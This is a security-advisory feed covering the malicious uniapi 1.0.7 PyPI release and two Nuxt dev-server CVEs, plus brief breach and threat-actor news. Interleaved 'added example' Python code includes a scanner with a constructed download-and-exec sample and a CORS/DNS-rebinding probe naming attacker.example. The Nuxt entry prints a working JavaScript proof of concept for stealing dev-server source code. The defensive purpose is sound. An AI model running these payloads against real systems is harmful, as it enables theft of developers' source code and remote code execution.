Description: uniapi version 1.0.7 contains code that runs on import of the module: it downloads a script from a remote URL and executes the downloaded script in a thread. The downloaded script harvests system information and POSTs it to another remote URL. This code was found in the PyPI release artifacts and was not present in the public GitHub repository.
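The pattern the advisory describes (network fetch at import time, then exec or a background thread) can be triaged statically before a package is ever installed. The following is an added example, not code from uniapi or from the PyPI advisory database: an AST walk that collects the statements a module executes on import (top-level code plus any top-level function that top-level code calls or hands to a thread), resolves import aliases so `r.post` and `urlopen` map to their dotted names, and flags the combination. The callee lists and the two sample modules are constructed for illustration; they are not the uniapi 1.0.7 payload.

```python
"""Triage Python source for the import-time "download and run" pattern.
Added example, not code from uniapi or the PyPI advisory database; the
sample modules are constructed and are not the uniapi 1.0.7 payload."""
import ast
import io
import tarfile
from collections import defaultdict

# Illustrative callee lists keyed by dotted name (not exhaustive).
NETWORK = {"urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get", "requests.post"}
CODE_EXEC = {"exec", "eval", "compile"}
BACKGROUND = {"threading.Thread", "subprocess.Popen", "subprocess.run", "os.system"}


def _collect_aliases(tree):
    """Map local names to the dotted names they were imported as."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                root = a.name.split(".")[0]
                aliases[a.asname or root] = a.name if a.asname else root
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _qualname(func, aliases):
    """Resolve a call target such as r.post or urlopen to its dotted name."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if not isinstance(func, ast.Name):
        return None
    return ".".join(reversed(parts + [aliases.get(func.id, func.id)]))


def import_time_statements(tree):
    """Everything that runs on import: top-level statements plus the bodies of
    top-level functions that top-level code references (called or passed as a target)."""
    defs = {n.name: n for n in tree.body if isinstance(n, ast.FunctionDef)}
    skip = (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)
    reachable = [n for n in tree.body if not isinstance(n, skip)]
    work, seen = list(reachable), set()
    while work:
        for node in ast.walk(work.pop()):
            if isinstance(node, ast.Name) and node.id in defs and node.id not in seen:
                seen.add(node.id)
                reachable += defs[node.id].body
                work += defs[node.id].body
    return reachable


def triage_module(source):
    """Return {'suspicious': bool, 'hits': {category: [(line, callee), ...]}}."""
    tree = ast.parse(source)
    aliases = _collect_aliases(tree)
    hits = defaultdict(list)
    for stmt in import_time_statements(tree):
        for node in ast.walk(stmt):
            if isinstance(node, ast.Call):
                name = _qualname(node.func, aliases)
                for label, names in (("network", NETWORK), ("exec", CODE_EXEC), ("background", BACKGROUND)):
                    if name in names:
                        hits[label].append((node.lineno, name))
    # A fetch at import time combined with exec or a background thread is the
    # advisory's pattern; either alone is common in legitimate code.
    suspicious = "network" in hits and ("exec" in hits or "background" in hits)
    return {"suspicious": suspicious, "hits": dict(hits)}


def triage_sdist(tar_bytes):
    """Run triage_module over every .py file in a gzipped sdist held in memory."""
    results = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for m in tar.getmembers():
            if m.isfile() and m.name.endswith(".py"):
                results[m.name] = triage_module(tar.extractfile(m).read().decode())
    return results


# Constructed samples showing the shape of the pattern, not the real payload.
MALICIOUS_INIT = '''
import threading
import urllib.request

def _stage2():
    code = urllib.request.urlopen("http://example.invalid/stage2.py").read()
    exec(compile(code, "<remote>", "exec"))

threading.Thread(target=_stage2, daemon=True).start()
'''
BENIGN_INIT = '''
import urllib.request

def fetch(url):
    return urllib.request.urlopen(url).read()
'''
```

`triage_sdist` takes the raw bytes of a downloaded `.tar.gz` release artifact, which is the natural place to run this: the advisory's finding was precisely that the PyPI artifact differed from the repository, so the artifact, not the Git tree, is what needs inspecting. The benign sample shows why the rule requires the combination: a library that fetches URLs inside a function nobody calls at import time is not flagged.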
References
https://github.com/pypa/advisory-database/tree/main/vulns/uniapi/PYSEC-2025-2.yaml
https://inspector.pypi.io/project/uniapi/1.0.7/packages/0f/40/c6e06c22bbc22ef45f40bf5a7711763fa08fec4d16b4718d86fd60970131/uniapi-1.0.7.tar.gz/uniapi-1.0.7/uniapi/__init__.py#line.11
https://github.com/advisories/GHSA-gvvw-rr8m-fj76
January 27th, 2025 (5 months ago)
|
CVE-2025-24360 |
Description: Summary
Nuxt allows any website to send requests to the development server and read the responses, due to its default CORS settings.
Details
While Vite patched the default CORS settings to fix https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6, nuxt uses its own CORS handler by default (https://github.com/nuxt/nuxt/pull/23995).
https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/client.ts#L257-L263
That CORS handler sets Access-Control-Allow-Origin: *.
[!IMPORTANT] If on an affected version, it may be possible to opt out of the default Nuxt CORS handler by configuring vite.server.cors.
PoC
Start a dev server in any Nuxt project that uses the Vite builder with nuxt dev.
From a page on a different origin, send a fetch request to http://localhost:3000/_nuxt/app.vue (fetch('http://localhost:3000/_nuxt/app.vue')); the response body is readable because of the wildcard header.
Impact
Users of the Vite builder who keep the default server.cors option may have their source code stolen by malicious websites.
Additional Information
/__nuxt_vite_node__/manifest and /__nuxt_vite_node__/module also appear to be served with Access-Control-Allow-Origin: *, so it may also be possible to exploit that handler.
https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/vite-node.ts#L39
Although I didn't find a valid module id.
Note that this handler is probably also vulnerable to DNS rebinding attacks as I didn't find any host header checks.
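The two checks this advisory implies (does a foreign Origin receive a permissive Access-Control-Allow-Origin, and is a request with a foreign Host header still served, which is what makes DNS rebinding work) are shown below as an added example in Python; it is not Nuxt or Vite code. A stand-in dev server can be started either with the weak wildcard policy or with an origin allowlist plus Host validation, and a probe reports both weaknesses against whichever server port it is pointed at. The server, the `/_nuxt/app.vue` body and the attacker origin are constructed for the demonstration.

```python
"""Stand-in dev server plus a probe for the two weaknesses in this advisory.
Added example in Python, not Nuxt or Vite code: the server, its response body
and the attacker origin are constructed; the probe can be aimed at any local port."""
import http.server
import threading
import urllib.error
import urllib.request

LOCAL_HOSTS = {"localhost", "127.0.0.1", "[::1]"}


def host_is_local(host_header):
    """Reject DNS rebinding: the Host header must name the developer's own machine,
    not an attacker-controlled domain that happens to resolve to 127.0.0.1."""
    if not host_header:
        return False
    host = host_header.split("]")[0] + "]" if host_header.startswith("[") else host_header.split(":")[0]
    return host.lower() in LOCAL_HOSTS


def cors_headers(origin, allowed_origins):
    """Echo the Origin only when allowlisted; a wildcard lets any site read the body."""
    if origin and origin in allowed_origins:
        return {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}
    return {}


def make_handler(allowed_origins, check_host):
    """allowed_origins=None reproduces the weak default (ACAO: *); a set enables the allowlist."""
    class Handler(http.server.BaseHTTPRequestHandler):
        def log_message(self, *args):  # keep the demo quiet
            pass

        def do_GET(self):
            if check_host and not host_is_local(self.headers.get("Host")):
                self.send_error(403, "unexpected Host header")
                return
            if allowed_origins is None:
                extra = {"Access-Control-Allow-Origin": "*"}
            else:
                extra = cors_headers(self.headers.get("Origin"), allowed_origins)
            body = b"<script setup>const secret = 'dev-only source'</script>"  # constructed
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.send_header("Content-Length", str(len(body)))
            for k, v in extra.items():
                self.send_header(k, v)
            self.end_headers()
            self.wfile.write(body)
    return Handler


def start_server(allowed_origins=None, check_host=False):
    """Serve on an ephemeral 127.0.0.1 port in a daemon thread; call .shutdown() when done."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), make_handler(allowed_origins, check_host))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(port, path="/_nuxt/app.vue", attacker_origin="https://attacker.example"):
    """Ask the two questions a reviewer would ask of a dev server: does a foreign
    Origin get a permissive Access-Control-Allow-Origin, and is a foreign Host served?"""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # never via a proxy

    def get(headers):
        req = urllib.request.Request(f"http://127.0.0.1:{port}{path}", headers=headers)
        try:
            with opener.open(req, timeout=5) as resp:
                return resp.status, resp.headers
        except urllib.error.HTTPError as err:
            return err.code, err.headers

    status, hdrs = get({"Origin": attacker_origin, "Host": f"localhost:{port}"})
    acao = hdrs.get("Access-Control-Allow-Origin")
    status2, _ = get({"Host": f"attacker.example:{port}"})
    return {
        "cross_origin_read": status == 200 and acao in ("*", attacker_origin),
        "dns_rebinding": status2 == 200,
    }


if __name__ == "__main__":
    for label, srv in (("default (wildcard, no Host check)", start_server()),
                       ("hardened", start_server({"http://localhost:3000"}, check_host=True))):
        print(label, probe(srv.server_address[1]))
        srv.shutdown()
```

The probe treats a reflected attacker Origin the same as `*`, since either lets the attacker's page read the body; and it sends the rebinding request without an Origin header on purpose, because a rebinding attack reaches the server as a same-origin request from the attacker's domain and never carries one.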
References
https://github.com/nuxt/nuxt/security/advisories/GHS...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|
CVE-2025-24361 |
Description: Summary
Source code may be stolen during development when using the webpack / rspack builder and opening a malicious website.
Details
Because a classic script loaded via a script tag is not subject to the same-origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> into their site and run the script.
By calling Function::toString on the module functions in window.webpackChunknuxt_app, the attacker can recover the source code.
PoC
Create a Nuxt project with the webpack / rspack builder.
Run npm run dev
Open http://localhost:3000
Run the script below on a website that has a different origin.
The source code is written into the document and to the devtools console.
const script = document.createElement('script')
// A classic script load is not blocked by the same-origin policy
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
  // Each entry in the webpack chunk registry holds the chunk's module map at index 1
  for (const page in window.webpackChunknuxt_app) {
    const moduleList = window.webpackChunknuxt_app[page][1]
    console.log(moduleList)
    // Every module is a function, so toString() yields its compiled source
    for (const key in moduleList) {
      const p = document.createElement('p')
      const title = document.createElement('strong')
      title.textContent = key
      const code = document.createElement('code')
      code.textContent = moduleList[key].toString()
      p.append(title, ':', document.createElement('br'), code)
      document.body.appendChild(p)
    }
  }
})
document.head.appendChild(script)
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in t...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|
Description: The Open Web Application Security Project has recently introduced a new Top 10 project - the Non-Human Identity (NHI) Top 10. For years, OWASP has provided security professionals and developers with essential guidance and actionable frameworks through its Top 10 projects, including the widely used API and Web Application security lists.
Non-human identity security represents an emerging
January 27th, 2025 (5 months ago)
|
Description: UnitedHealth Group has disclosed that the February 2024 ransomware attack on its Change Healthcare subsidiary affected approximately 190 million individuals, nearly double its initial estimate of 100 million. The confirmation, provided to TechCrunch late Friday, makes this the largest medical data breach in U.S. history. In a statement, UnitedHealth spokesperson Tyler Mason acknowledged the staggering …
The post UnitedHealth Data Breach Tally Upped to 190 Million Americans appeared first on CyberInsider.
January 27th, 2025 (5 months ago)
|
Description: A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities.
The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon.
January 27th, 2025 (5 months ago)
|
Description: Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC.
"MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,"
January 27th, 2025 (5 months ago)
|